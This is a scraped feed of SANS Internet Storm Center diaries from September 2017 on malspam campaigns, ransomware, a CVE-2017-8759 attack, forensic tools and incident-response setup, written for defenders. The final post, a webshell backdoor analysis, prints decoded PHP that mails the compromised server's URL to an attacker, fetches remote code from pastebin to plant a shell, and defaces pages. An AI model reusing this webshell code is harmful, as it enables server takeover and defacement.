Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 16 perc 14 másodperc
7 óra 33 perc

What is the State of Your Union? , (Fri, Sep 22nd)

Regularly the President of the United States delivers the State of the Union address. This practice "fulfills rules in Article II, Section 3 of the U.S. Constitution, requiring the President to periodically give Congress information on the "state of the union” and recommend any measures that he believes are necessary and expedient.".

What if you as an information security leader held an information security State of the Union address with the explicit purpose of educating both your leaders and business partners on your information security program and the areas of focus for the next year? Communicating to those who are not in our area is certainly a challenge; however, the benefits outweigh the effort in several different ways.

By being intentional at sharing the state of your security union, you can not only deliver the status of your program but also equip your leaders with information they can quite literally share in environments that your team is not able to attend.  

What are some candidates to include in your State of the Union?

  • Effectiveness of your program
  • Opportunities to improve your program
  • Communicate recent achievements
  • Demonstrate stewardship of your resources
  • Show how your team supported objectives of your organization
  • Possible actions that you want others to take
  • Clear call to action to the leaders to increase support, funding, and staffing
  • Opportunity to receive feedback

How are you communicating the State of Your Security Union? Please leave what works in our comments section below!

Russell Eubanks

ISC Handler

SANS Instructor


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 22.

Malspam pushing Word documents with Hancitor malware, (Fri, Sep 22nd)


I previously wrote a diary on Hancitor back in February 2017.  Even though I haven't written a diary about it lately, it's been a near-daily occurrence since then.  There's been no significant change, which is why I haven't bothered.  Thursday 2017-09-21 included yet another wave of malicious spam (malspam) pushing Hancitor Word documents.  Since it's been a while, let's review indicators for this most recent wave.

Hancitor, also known as Chanitor or Tordal, pushed Pony and Vawtrack last year.  However, this year it stopped using Vawtrack and now pushes DELoader/ZLoader.  The most recent technical write-ups I've seen on Hancitor are here, here, and here.

At least two Twitter accounts routinely tweet indicators for Hancitor malspam like URLs and file hashes.  The ones I routinely check are @cheapbyte (example) and @James_inthe_box (example).  However, other accounts also tweet Hancitor indicators.  You can keep up with this near-daily information by searching Twitter for recent tweets tagged #hancitor.

The emails

Thursday's emails were disguised as yet another invoice, this time spoofing a company named Advanced Maintenance.  Advanced Maintenance is a general contract and maintenance "handyman" company with various locations in the US.  The emails all spoof a domain name registered by the company's President/CEO named  However, these messages are not related to Advanced Maintenance, and they do not actually come from that domain.

Advanced Maintenance is aware of this malspam.  If you go to the company's official website, you'll see a warning to ignore these emails.

Shown above:  Pop-up message from the company's official website.

Links in the email point to various URLs designed to download a malicious Word document.  As in previous waves of malspam, the downloaded Word document has macros designed to infect a vulnerable Windows computer, if enabled.

Shown above:  Screenshot from one of the emails.

Shown above:  Clicking on a link from the email sent me a malicious Word document.

Shown above:  The malicious Word document waiting for me to enable macros.

The traffic

I infected a host in my lab.  Network traffic was typical for what we've seen in recent months from Hancitor malspam.  The only difference?  I didn't see a base64 string in the initial HTTP GET request for the Word document like I did earlier this week.  That base64 string represents the recipient's email address, which has been standard practice for months now.  However, this time, the initial HTTP GET request used a plaintext string for the recipient's email address.

Shown above:  Traffic from an infection filtered in Wireshark.

Snort and Suricata alerts on the network traffic are the same as we've seen for months now.  This campaign has slowly evolved, but it's noticeably the same as earlier this year.

Shown above:  Some alerts from the Snort subscription ruleset using Snort

Shown above:  Some alerts from the EmergingThreats Pro ruleset using with Suricata on Security Onion.

The infected host

After a cursory search, I couldn't determine how malware stays persistent on an infected Windows host.  However, I did find several artifacts for encrypted traffic-related services like Tor.

Shown above:  Artifacts found in a infected user's AppData\Local\Temp directory.

Shown above:  Artifacts found in a infected user's AppData\Roaming directory.

Indicators of Compromise (IOCs)

The following IOCs and other indictors are for Hancitor malspam on Thursday 2017-09-21.

Email headers:

  • Date/Time:  Thursday 2017-09-21 as early as 16:58 UTC through at least 18:42 UTC
  • Sender (spoofed):  "Advanced Maintenance Inc." <>
  • Examples of subject lines:
    • Subject:  FW: Your Invoice I114738207 from Advanced Maintenance
    • Subject:  FW: Your Invoice I131761045 from Advanced Maintenance
    • Subject:  FW: Your Invoice I144174411 from Advanced Maintenance
    • Subject:  FW: Your Invoice I156641102 from Advanced Maintenance
    • Subject:  FW: Your Invoice I182402737 from Advanced Maintenance

Associated traffic:

  • EAFGI.COM - GET /in.php?n=[recipient's email address]
  • - GET /in.php?n=[recipient's email address]
  • - GET /in.php?n=[recipient's email address]
  • TRUSTDEEDCAPITAL.NET - GET /in.php?n=[recipient's email address]
  • TRUSTDEEDCAPITAL.ORG - GET /in.php?n=[recipient's email address]
  • - GET /in.php?n=[recipient's email address]
  • port 80 - - POST /ls5/forum.php
  • port 80 - - POST /mlu/forum.php
  • port 80 - - POST /d2/about.php
  • port 80 - - GET /wp-content/plugins/all-in-one-seo-pack/1
  • port 80 - - GET /wp-content/plugins/all-in-one-seo-pack/2
  • port 80 - - GET /wp-content/plugins/all-in-one-seo-pack/3
  • port 80 - - POST /bdl/gate.php
  • - GET /
  • - GET /
  • Various IP addresses over various TCP ports - Tor traffic
  • port 443 - TCP SYN packet approx once avery 5 minutes

Malware recovered from the infected host:

SHA256 hash:  39d99fdcc0bd9bb9c7ccf65af499eec073265424f1310bc02b51954b8f6f9782

  • File size:  390,656 bytes
  • File name:  invoice_729017.doc
  • File description:  Word document with macros that run Hancitor

SHA256 hash:  7ffcaf562952dc920e5026c862b4034cadb4ef8c59ec96a5ae0a2768db513746

  • File size: 194,048 bytes
  • File location:  C:\Users\[username]\Local\Temp\BNE53F.tmp
  • File location:  C:\Users\[username]\Roaming\Awceiv\coof.exe
  • File description:  Follow-up malware, DELoader/ZLoader

Final words

As it stands, the open nature of our Internet makes it easy for criminals behind Hancitor malspam and other campaigns to operate.  For example:

  • Email protocols make it trivially easy for criminals to spoof a sending address and other header lines to mislead recipients.
  • Hosting providers and tools like Wordpress allow practically anyone to set up a website, then forget to keep it patched and up-to-date.  Enormous numbers of these legitimate websites are compromised by criminals and used in various campaigns.
  • Requirements to fraudulently establish an account at a hosting provider are easy to obtain.  This encourages a cycle of abuse as criminals establish new servers, those servers are reported, the hosting provider shuts them down, and criminals set up new servers.
  • Windows is still a mainstream operating system, and its default settings provide criminals relatively easy targets to infect.  Outdated versions like Windows 7 and XP still account for over 50% of the desktop market share.  These hosts are even easier to infect, especially if they're not up-to-date and patched.

I view network-enabled computing devices like I view most middle-aged adults living a sedentary lifestyle.  Both are probably healthier than they seem, even if there is plenty of room for improvement.  All you need is the right mindset.  The Internet is a wonderful place, but it's also a great equalizer.  Both good and bad people coexist in the same space when we're online.  It pays to be careful if you're out and about in a cyber sense--whether you're reading email, browsing the web, or interacting with social media.

As usual, it's relatively easy for system administrators (and the technically inclined) to follow best security practices on their Windows computers.  Using Software Restriction Policies (SRP) or AppLocker can easily prevent these types of malspam-based infections from occurring.  If you have any other tips, please share them in the comments.

Traffic and malware samples for today's diary can be found here.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 22.

ISC Stormcast For Friday, September 22nd 2017;id=5680, (Fri, Sep 22nd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 21.

Emails threatening DDoS allegedly from Phantom Squad, (Thu, Sep 21st)


As a follow-up to one of our June 2017 diaries asking people to forward us any DDoS threats, we received yet another example: 

Date: Tuesday 2017-09-19 at 18:04 UTC
Subject: DDoS Warning
From: <>
Message-Id: <1505844251.007448.31360.nullmailer@me>

Hello, [removed]


We are Phantom Squad

Your network will be DDoS-ed starting Sept 30st 2017 if you don't pay protection fee - 0.2 Bitcoin @ [removed].

If you don't pay by Sept 30st 2017, attack will start, yours service going down permanently price to stop will increase to 20 BTC and will go up 10 BTC for every day of attack.

This is not a joke.



Since 2017-09-19, at least 4 people have tweeted about the same type of emails, supposedly from Phantom Squad:

This feels like a scam using the notariety of Phantom Squad's name, because the group has gotten some fairly high-profile press coverage in recent years.  In December 2015, Phantom Squad claimed responsibility for a DDoS attack against Xbox Live.  A year later in December 2016, Phantom Squad was apparently involved in a DDoS attack against Steam.  However, I haven't found any evidence yet this group is involved in small business extortion.

Wheter or not this email is legitimate or fake, they all use notariety of the group's name to make the threat sound plausible.

In our June 2017 diary about fake DDoS extortion emails, Johannes Ullrich provides some guidance for people that receive these types of messages.  Tips include:

  • Verify your DDoS plan:  Do you have an agreement with an anti-DDoS provider?  A contact at your ISP?  If so, make sure everything is set up and working right.
  • Attackers often run short tests before launching a DDoS attack.  Can you find any evidence of that?  Has there been a brief, unexplained traffic spike?  If so, take a closer look.  The threat is more serious if you detect an actual test, because the purpose of a test is often to assess the firepower needed to DDoS your network.

Final words

Thanks to everyone who already forwarded examples to us.  As Johannes previously asked in June 2017, please continue to forward us any similar emails.  We can always use the additional data.

A santized copy of our most current example can be found here.  It's in a password-protected zip archive.  If you don't know the password, look here.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 21.

Email attachment using CVE-2017-8759 exploit targets Argentina, (Thu, Sep 21st)


On 2017-09-12, FireEye published a blog post about a zero-day exploit utilizing CVE-2017-8759.  The vulnerability was fixed that same day with Microsoft's September 2017 Security Updates.

In FireEye's blog post, this exploit was used against Russian speakers to distribute FINSPY malware.  By 2017-09-19, I ran across another email spoofing an Argentina government agency using a CVE-2017-8759 exploit to distribute Betabot malware.

Today's diary reviews the email, malware, and traffic associated with this most recent exploit for CVE-2017-8759.

The email and attachment

The email pretends to be from the Administracion Federal de Ingresos Publicos (AFIP) a Argentina government agency responsible for tax collection and administration.  The message actually came from a commercial mail server on an IP address assigned to Gualberto Larrauri, an Argentina-based Internet service provider (ISP).

The message describes the attachment as a manual for the AFIP purchasing portal.  The attachment is a zip archive, and that archive contains a Rich Text Format (RTF) file with .doc as the file extension.  True to its word, the RTF file contains an annex to the official AFIP document covering the subject.  It also contains an exploit for CVE-2017-8759.  Merely opening the file using Microsoft Word will infect a vulnerable Windows computer.

Shown above:  Screenshot of the email.

Shown above:  Email headers indicate where the email actually came from.

Shown above:  The email attachment and extracted RTF document.

Follow-up malware

Opening the RTF document generated Powershell activity that retrieved a Windows executable.  This follow-up executable triggered EmergingThreats alerts for Neurevt.A/Betabot when I infected a host in my lab.  The malware was made persistent through a Windows registry update.

Shown above:  Follow-up malware (Betabot) made persistent on the infected Windows host.

Network traffic

Infection traffic included HTTP requests for SOAP code injection, JavaScript, Powershell script, and a Windows executable over TCP port 8007.  Post-infection activity consisted of HTTP POST requests over TCP port 80.

Shown above:  Network traffic for this infection filtered in Wireshark.

Shown above:  Alerts from Sguil in Security Onion using Suricata with the EmergingThreats Pro ruleset.

Indicators of Compromise (IOCs)

Headers from the email:

  • Received:  from ([])
  • Envelope-sender:  <> 
  • Message-ID:  <>
  • Date:  Tuesday, 2017-09-19 at 21:48 UTC
  • From:  "Administracion Federal de Ingresos Publicos - (AFIP)" <>
  • Subject:  Noticia de Actualizacion - Sistema de Compras (AFIP)

File hashes:

SHA256 hash:  7bd46284dabf1f400102aa35e123eb2ffe2838560fbc016ba4f2cd376742004c

  • File size:  52,132 bytes
  • File type:  Zip archive
  • File name:
  • File description:  Email attachment

SHA256 hash:  4a07c6f26ac9feadbd78624d4e063dfed54e972772e5ee34c481bdb86c975166

  • File size:  286,981 bytes
  • File type:  Rich Text Format (RTF) file
  • File name:  comprasAnexoII.doc
  • File description:  RTF file with CVE-2017-8759 exploit

SHA256 hash:  610e6611b3b2e3bd85173cba76bf069fb7134b86f533141f79811fcc29d62b33

  • File size:  440,832
  • File type:  PE32 executable
  • File location:  hxxp://
  • File location:  C:\ProgramData\SystemMicrosoftDefender2.1\[random characters].exe
  • File description:  Follow-up malware, Neurevt.A (Betabot)

Infection traffic:

  • port 8007 - - GET /txt/doc.txt
  • port 8007 - - GET /txt/accounts.hta
  • port 8007 - - GET /txt/pause.ps1
  • port 8007 - - GET /txt/words.exe

Post-infection traffic:

  • port 80 - - POST /.av/logout.php
  • port 80 - - POST /.av/logout.php?id=[various numbers]

Final words

As I write this, nine days have passed since Microsoft released its update to address CVE-2017-8759.  The associated exploit is no longer a zero-day.  If your organization follows best security practices, you should be fine.

However, many organizations are notoriously slow to apply these updates.  Be aware this exploit is active in the wild.  I'm sure it will eventually find its way to wide-scale distribution through malicious spam.

A copy of the email, taffic, and associated malware for today's diary can be found here.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 21.

ISC Stormcast For Thursday, September 21st 2017;id=5678, (Thu, Sep 21st)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 20.

Ongoing Ykcol (Locky) campaign, (Wed, Sep 20th)

Today I noticed a high amount of e-mails on my honeypots with similar subject, body and attachment. It caught my attention . After inspecting the attachments and doing some analysis, it was not difficult to realize that those supposed “Status Invoice” messages were, indeed, part of an ongoing campaign pushing a Locky ransomware variant that is being called Ykcol (or Locky in reverse) due to the encrypted file extension (“.ykcol”).

In today’s phishing messages, I noticed an additional subject line “Your Payment” and “.rar” attachments instead of the “zip” ones seen two days ago based on a post from Bleeping Computer[1].

The threat flow of today’s campaign is very simple and can be seen in Figure 1.

Figure 1 – YKCOL Threat Flow


Indicators of compromise (IOCs)

From the samples I received, it was possible to identify 4 (four) different VBS samples, from which the following IOCs were extracted:


MD5 (20080920_239777.vbs) = a93845a2e5e4660fb673d949a1f69bc6
MD5 (20080920_387690.vbs) = 2a067fb838be5af230df6a51aa25ea08
MD5 (20080920_441014.vbs) = 638d0a50bf8a166ffed382b7f9935c4e
MD5 (20080920_860397.vbs) = 77482e00daafbb3cec934c98510f0e19
MD5 (RSkfsNR7*) = 83be007cb41eec07e5ae8270cf98a7a6

* Although I tried to manipulate the HTTP POST request changing the parameter “UA-CPU: AMD64” to other architectures, the binary offered by the server in response was the same.




All e-mails were sent by “ordering” @ some domain, like: or with a message like the following one:


Could you please let me know the status of the attached invoice? I
appreciate your help!

Best regards,

Final words


Something that caught my attention during YKCOL VBS analysis was that the scripts were not obfuscated and contained lots of code unrelated to malicious activities or C&C communication. As seen in Figure 2, we can see a random function called Anim2UniBall that is not called by the script:


Figure 2 – Random code snippet


Searching for this code snippet, I could find many similarities with a gaming framework called OpenARC [2], a clone of a 20 years old game called “Attack, Retrieve, Capture”.

Games apart, not obfuscating and including random code would be a strategy to evade anti-malware euristics? Or maybe trying to trick someone that do not carefully read the code to execute it?

Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 20.

ISC Stormcast For Wednesday, September 20th 2017;id=5676, (Wed, Sep 20th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 19.

New tool:, (Tue, Sep 19th)

On a recent forensic investigation where we couldn't take the Linux system down to image the disks, I was forced to do live response. Fortunately, I was able to get a memory image, but I also wanted a filesystem timeline. I first went to my old friend fls from The SleuthKit (TSK), but for some reason, it failed. So, I tried mac-robber (also from TSK) and it, too, failed. Not one to give up easily, I decided to write my own version of mac-robber in Python. Like the TSK mac-robber, it outputs the data in body file format (so that it can be fed into mactime or elasticsearch). Like the TSK version, by default, it does not hash the files (so it doesn't modify access times), so the "MD5" column defaults to 0. In this case, though, I had reason to believe that there might be multiple copies of some potential malware scattered around the filesystem, so I really wanted to grab hashes, too. So I included the capability in the tool (in my next diary, I'll explain the trick I used to grab hashes without modifying access times). A couple of other notes on the tool. It only hashes "regular" files, it doesn't attempt to hash soft-links, block or character device files, pipes, or sockets. It also skips /proc/kcore which to os.stat() looks like a regular file, but on my dev box is 128TB (a little more than I want to hash). At the moment, it uses MD5 as the hash because that is what fls uses, but I could easily be talked into substituting SHA256 (or SHA3 of whatever length, though in Python < 3.6 this requires pip-installing the pysha3 module). Also, due to a limitation in Python's os.stat(), it only give MAC times, not B time (even if available in the filesystem in question). The tool should work just fine on Linux/Unix, Mac OS X, or Windows with a standard install of Python 2.7 or later though it has not been extensively tested on anything other that Linux to date. Another feature that I added to mine was the ability to add or remove prefixes to the path and to exclude specific directories of files. The -m switch behaves just like the corresponding switch in fls and allows you to prefix the path with a system name or drive letter. The -r switch allows you to remove a prefix (for example, when the directory in question has been mounted on /mnt, but you want your report to show the actual path on the system in question). The -x option actually needs more work, at present, it isn't as flexible as I'd like, but if you want to skip a specific directory or file you can.

The tool can be downloaded from my docker-forensics github and is distributed under the BSD 3-clause license. I hope you find it useful. If you have any questions, comments, suggestions, or bug fixes, please let me know via the comments here, our contact form, or create an issue (or pull request) on github.



Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu


Upcoming Courses Taught By Jim Clausing


Type Course / Location Date
Community SANS   FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques
Community SANS Ottawa FOR610 Ottawa, ON Dec 4, 2017 -
Dec 9, 2017 (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 19.

ISC Stormcast For Tuesday, September 19th 2017;id=5674, (Tue, Sep 19th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 18.

SANS Securingthehuman posted a follow up to their Equifax breach webcast:, (Mon, Sep 18th)

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 18.

CCleaner 5.33 compromised -, (Mon, Sep 18th)

The version 5.33 of CCleaner[1] has been reported as compromised (only the 32bits version) and delivers a malware during the installation. If you installed CCleaner between Augustus 15th and September 12th, you better have to search for potentially infected systems. Here is the list of DGA domains that could help to track the infected hosts:


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 18.

Getting some intelligence from malspam, (Mon, Sep 18th)

Many of us are receiving a lot of malspam every day. By "malspam", I mean spam messages that contain a malicious document. This is one of the classic infection vectors today and aggressive campaigns are started every week. Usually, most of them are blocked by modern antivirus or anti-spam but these files could help us to get some intelligence about the topic used by attackers to fool their victims. By checking the names of malicious files (often .rar, .gip or .7r archives), we found classic words like ‘invoice’, ‘reminder’, ‘urgent’, etc… From an attacker perspective, choosing the right name can increase the chances that the target will open the file by business needs or just…curiosity!

I collected files attached to malicious emails and tried to categorize them to determine what were the most common names. To achieve this, I created a list of simple regular expressions based on classic strings and assigned a category to them. Both are stored in a CSV files:

Regex,Category <redacted>,Targeted <redacted>,Targeted .*inv[oi]ce.*,Commercial .*facture.*,Commercial inv.*,Commercial .*RF[QP].*,Commercial .*order.*,Commercial .*po.*,Commercial .*quotation.*,Commercial .*purchas.*,Commercial .*voucher.*,Commercial .*payment.*,Financial_Services .*slip.*,Financial_Services .*ban(k|que).*,Financial_Services .*swift.*,Financial_Services .*(HSBC).*,Financial_Services .*remitance.*,Financial_Services .*wire.*,Financial_Services .*IDBI.*,Financial_Services .*fraud.*,Financial_Services .*loan.*,Financial_Services .*paypal.*,Internet_Services .*dropbox.*,Internet_Services .*microsoft.*,Internet_Services .*apple.*,Internet_Services .*(DHL|UPS|TNT).*,Delivery_Services .*parcel.*,Delivery_Services .*shipping.*,Delivery_Services .*packet.*,Delivery_Services .*fax.*,Communication_Services .*mfp.*,Communication_Services .*voice.*,Communication_Services .*scan.*,Communication_Services .*email.*,Communication_Services .*resume.*,Business_Services .*cv.*,Business_Services .*contract.*,Business_Services .*letter.*,Business_Services .*account.*,Business_Services .*confirmation.*,Business_Services .*confidential.*,Sensitive_Documents .*crypted.*,Sensitive_Documents .*urgent.*,Sensitive_Documents .*secure.*,Sensitive_Documents .*protected.*,Sensitive_Documents \d+\.\s+,Numeric_Documents .*booking.*,Booking_Services .*photo.*,Media_Services .*video.*,Media_Services .*pic.*,Media_Services .*foto.*,Media_Services pdf.*,Media_Services img.*,Media_Services IMG.*,Media_Services

(Note that the two first lines have been obfuscated because they are related to really targeted attacks against an organization)

Then I built a list of 94387 filenames based on the data that I collected since the beginning of 2017. The best place to collect those data is on your incoming mail server or any anti-spam, anti-malware solution logfiles. This is a good opportunity to remind you that logs are critical, log as much as possible! How to check the filenames against all the regular expressions above and tag them with the second field ('Category'). To perform this in an efficient way, I used Splunk.

The regular expressions are stored in the ‘maldocs_re.csv’ file and the filenames into ‘maldocs.csv’ and the following query will return interesting statistics:

|inputlookup maldocs.csv |eval count=0 |join max=0 count [| inputlookup maldoc_re.csv | eval count=0] |eval test=if(match(filePath, Regex),1,0) |where test=1 |stats count by Category

After a few seconds or minutes later, depending on the amount of data you have to process, you will get a nice graph like this:

You can see that most of the malicious files are based on media files but that we also have some hits against the 'Targeted' category. It would be worth to have a look at them! Finally, if you define a single category called ‘Targeted’ with good regular expressions matching your business activity, domain names, login formats, brands or whatever, you can generate alerts if such files are sent to your users and be aware of potential targeted attacks!

Happy hunting!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 18.

ISC Stormcast For Monday, September 18th 2017;id=5672, (Mon, Sep 18th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 17.

rockNSM as a Incident Response Package, (Sun, Sep 17th)

Are you looking for a lightweight system to be part of your Incident Response kit? This is probably the package for you. It contains all the basic elements needed to capture data on the fly with Suricata, Bro, Logstash, Kibana, Elasticsearch and Kafka needed to conduct an investigation. Two options exist to get going to build your system, you can use the ISO built on CentOS 7.3 or built your own, and obviously I recommend using the ISO; make sure you check the hardware requirement before starting. "The system you run this on should have at least 2 network interfaces and more than 8GB of RAM, with an OS (RHEL or CentOS 7) already installed."[2] The current version is 2.0.5 and I recommend reading the release notes.

This kit can also be use in a small network (i.e. home is a perfect place for it) as a complete IDS package. The current version has a small issue, when installing via the ISO, make sure when you see an option to create an account that you create your own before continuing, otherwise you won't be able to login.  After you complete the ISO installation, I recommend you run the following commands to complete the setup:

  • sudo su -
  • chown suricata:suricata /var/run/suricata
  • /opt/rocknsm/rock/bin/
  • /opt/rocknsm/rock/bin/
  • rock_status (check if everything is working)
  • rpm --import (install PGP key)
  • vi /etc/yum.repos.d/CentOS-Base.repo (gpgcheck and enable from 0 to 1)
  • yum clean all && yum check-update
  • yum update (Update all then reboot)
  • yum install bind-utils (optional if you need nslookup or dig)
  • http://IPADDRESS - to access Kibana (I recommand static address)

Check this page for additional information to troubleshoot the system. Overall easy to install (~20 minutes), easy to use and start traffic capture immediately. This is the output of the many Kibana dashboard displaying an overview over the past 24 hours of Bro capture.


Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 16.

VMware ESXi, vCenter Server, Fusion and Workstation updates resolve multiple security vulnerabilities -, (Sat, Sep 16th)

Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 15.

ISC Stormcast For Friday, September 15th 2017;id=5670, (Fri, Sep 15th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 14.

Another webshell, another backdoor&#x21;, (Thu, Sep 14th)

I’m still busy to follow how webshells are evolving… I recently found another backdoor in another webshell called “”. The best place to find webshells remind[1]. When I’m testing a webshell, I copy it in a VM located on a "wild Internet" VLAN in my home lab with, amongst other controls, full packet capture enabled. This way, I can spot immediately is the VM is trying to “phone home” to some external hosts. This was the case this time!

The web shell (SHA256: 518458a1d7d4b058adbd7dd8e283cc2762b444326b815d7c19ec4a333b2b2903) is unknown on VT. It requested another pastie[2] that is called at the beginning of the code:


The pastie is Base64 encoded and compressed. Here is the content:


This one is decoded as another Base64 bunch of data that, once decoded, contents:


The last code fetches a picture via the service called paceman.jpg. The picture looks normal: 

(Note: This is not the original one, this one has been sanitized)

If you read the EXIF[3] data, you’ll find indeed that the ‘UserComment’ field contains more Base64 data:

# exif -t UserComment pacman.jpg EXIF entry 'User Comment' (0x9286, 'UserComment') exists in IFD 'EXIF': Tag: 0x9286 ('UserComment') Format: 7 ('Undefined') Components: 2824 Size: 2824 Value: ZXZhbChzdHJfcm90MTMoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJ3JWWmJqNk5HR24xZktmOWgzM3FpeVFOZ2U2WlJGQ25ZZ0xtVndhWmMySDVwQVRFR2JITnhRNW5pMStlcmNrL1A3Q1NyeVVyN1VFSlExSGM1NTN3SGZxY3hmY2x1cHc5UFNYNUs4OU5MbmIrKzNvNDA3cDUra1g3KzlhZC8vZjcrUWt1emxGV1hsOXZ4bUJ5enAxLysvZGdYdHkvSFc1b2NUM0RzZzNoNkt5cjJvYTZ5MjZmcFMzdHJrdmIyNFNuYTJpVlpTeDJocStkcWE1enE5YlJiNEo1NWp2NXhzVFhTRnAvWmdxNU9DOU5mM2h4N3FCd3RnZmRQWkYwV0xXWlNqYTJQaTBCTmtCTU9pL3VaMW9veGcrc2RPVE1KdWVUakFuZG51QjlyWlNZUmpIcFBzVlEzaUN6UDZZdmFDUnRDL1d2bHBteGhsMVNEUmJCVzFGaTk4SHVpb1BHd1hwV0hzS1NMNGN3OE44cEphQlJrRTdGMmE3RG1YaFpvVlBOMlBYM2VLMjk1SnRHSjRQQU90UlgxWFc0STR6RmwxdUsrUUd1NGovMmltUmc4TDZ0SFRicTV2c2hkdTNZR1owcklJZTBWVkRTamRFSTRsRHhSMDZ5dkhWRzMzT0J6NFRtUVc4UmxBei9idW41V0srR0EzS2doOStsemkwTUt1SFRlcUY0UXRrVXZCMWhRbjlTSWZSMzIybnV0bkl1RzEwZ1BwZWh6N1l2em9xZkEvODk5ekxGNDdGZk9yR3hkdld1M3JFUkwyQjlSV21PYjk1UjdqaXo2UVNQTEVLOTlxNlcza2RkT1pJRWoxSUFDbnlMbEc1eXZxL0lkNS9zNXJXTmZodnp2c2R5SlhkWWhqMlhNR2l4d3VMWk9kS3BjZ1dNcWNHVXF4NGJmSzU1emxrVmRETTVodFlkOHVITE9ER3JnV3BFUTUydGlnRjVBUTl2SE04K0pNclR….

Once decoded, we have another set of Base64/gzipped/ROT13 data and again and again to finally get some interesting PHP code (only the relevant code is displayed to keep the diary short):

if(isset($_GET["0upload"])){ echo "$up"; } ///////////////////////////// if(isset($_GET["0cek"])){ echo "Password E :".$auth_pass; } ///////////////////////////// if (file_exists('.db')) { } else { $to = "syedich@yahoo[.]com"; $subject = $_SERVER['SERVER_NAME']; $header = "From: Mastah <jancok@matamucok[.]com>"; $message = "Exploit : http://";. $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI']; mail($to, $subject, $message, $header); $m = fopen(".db", "w") or die (" "); $txt = ""; fwrite($m, $txt); fclose($m); chmod(".db",0644); } ///////////////////////////// if(isset($_GET["0shell"])){ $anak1 = file_get_contents("hXXps://[.]com/site/bhshll123/bh.txt";); $nggawe1 = fopen("themes.php","w") or die ("gabisa pak"); fwrite($nggawe1,$anak1); fclose($nggawe1); header ("Location:themes.php"); chmod("themes.php",0644);} ////////////////////////////// if(isset($_GET["0deface"])){ $anak = file_get_contents("hXXp://pastebin[.]com/raw/6JA72K8m"); $nggawe = fopen("0x.htm","w") or die ("gabisa pak"); fwrite($nggawe,$anak); fclose($nggawe);

The external links on and aren’t available anymore but we can see interesting behaviors. Based on the GET parameter that is passed within the web shell URL, we have:

  • a form to upload more files to the compromised server (http://xxx?0upload)
  • a way to disclose the password used to restrict access to the web shell (http://xxx?0cek)
  • a shell interface (http://xxx?0shell)
  • a tool to deface (http://xxx?0deface)

You can also see that a mail is sent to a specific address with details to connect to the web shell.

How to search for interesting/suspicious code in PHP? I'm using the Viper[4] framework to keep all my samples in a central place. The extraction of URLs, IP addresses and User-Agents often returns interesting findings:

Webshells viper qyt0dHv1.php > strings -N [+] Network related: - @import url(hXXps://fonts.googleapis[.]com/css?family=Abel); - eval(gzinflate(base64_decode(file_get_contents('hXXp://pastebin[.]com/raw/6PJ9Pj8F';)))); - $_POST = idx_ss($_POST); - CreateTools("wso","hXXp://pastebin[.]com/raw/3eh3Gej2";); - CreateTools("adminer"."hXXps://www.adminer[.]org/static/download/4.2.5/adminer-4.2.5.php";;); - CreateTools("b374k","hXXp://pastebin[.]com/raw/rZiyaRGV";); - CreateTools("injection","hXXp://pastebin[.]com/raw/nxxL8c1f";); - CreateTools("promailerv2","hXXp://pastebin[.]com/raw/Rk9v6eSq";); - CreateTools("gamestopceker","hXXp://pastebin[.]com/raw/QSnw1JXV";); - CreateTools("bukapalapak","hXXp://pastebin[.]com/raw/6CB8krDi";); - CreateTools("tokopedia","hXXp://pastebin[.]com/dvhzWgby";); - CreateTools("encodedecode","hXXp://pastebin[.]com/raw/wqB3G5eZ";); - CreateTools("mailer","hXXp://pastebin[.]com/raw/9yu1DmJj";); - CreateTools("r57","hXXp://pastebin[.]com/raw/G2VEDunW";); - CreateTools("tokenpp","hXXp://pastebin[.]com/raw/72xgmtPL";); - CreateTools("extractor","hXXp://pastebin[.]com/raw/jQnMFHBL";); - CreateTools("bh","hXXp://pastebin[.]com/raw/3L2ESWeu";); - CreateTools("dhanus","hXXp://pastebin[.]com/raw/v4xGus6X";); - $ling="http://".$_SERVER['SERVER_NAME']."";; .$_SERVER['PHP_SELF']."?create"; [Stuff deleted] - <a href="hXXp://hub.obsidiancyberteam[.]id/">Obsidian Cyber Team</a>'; - if(adminer("hXXps://www.adminer[.]org/static/download/4.2.4/adminer-4.2.4.php","adminer.php";;)) { - curl_setopt($ch, CURLOPT_USERAGENT, 